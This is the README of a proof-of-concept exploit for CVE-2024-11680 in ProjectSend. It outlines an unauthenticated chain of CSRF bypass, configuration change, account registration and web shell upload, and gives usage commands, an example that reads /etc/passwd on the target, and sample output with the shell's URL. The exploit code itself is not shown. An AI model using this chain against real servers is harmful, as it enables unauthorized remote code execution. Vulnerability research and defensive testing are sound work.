Share
## https://sploitus.com/exploit?id=99EDA790-63DC-54E5-BD31-E8F82526C9DD
# ProjectSend CVE-2024-11680 Exploit
This is a proof-of-concept exploit for CVE-2024-11680, an unauthenticated configuration modification and web shell upload vulnerability in ProjectSend.
## Description
The exploit takes advantage of multiple vulnerabilities in ProjectSend:
- CSRF token bypass allowing configuration changes
- Insecure client registration settings
- Unrestricted file upload leading to remote code execution
## Requirements
- Python 3.x
- Required Python packages:
```
pip install requests colorama
```
## Usage
```bash
python3 exploit.py -u -c
```
### Arguments
- `-u`, `--url`: Target URL (e.g., http://target.com/projectsend)
- `-c`, `--command`: Command to execute on the target (default: id)
### Examples
```bash
# Get Python version
python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
# List directory contents
python3 exploit.py -u http://target.com/projectsend -c "ls -la"
# Get system information
python3 exploit.py -u http://target.com/projectsend -c "uname -a"
# Read passwd file
python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
```
## How it works
1. **Reconnaissance**: Fetches CSRF token and verifies target vulnerability
2. **Configuration Manipulation**: Enables insecure client registration options
3. **User Registration**: Creates a new client account with auto-approval
4. **File Upload**: Uploads a PHP web shell with .phtml extension
5. **Command Execution**: Executes specified commands through the uploaded shell
## Features
- Automatic CSRF token extraction
- Random user credentials generation
- Smart file naming and timestamp detection
- Colored output for better visibility
- Built-in command execution capability
## Legal Notice
This tool is for educational purposes only. Use it responsibly and only on systems you have explicit permission to test.
## References
- [CVE-2024-11680](https://vulners.com/cve/CVE-2024-11680)
## Example Output
```
[+] Target is vulnerable
[+] Insecure options enabled
[+] User registered successfully.
[+] New username: NoDLQWYF
[+] New password: X02A3g9LuN4S
[+] File uploaded: kLoISqdA.phtml
[+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
[+] Command Output:
Python 3.9.2
```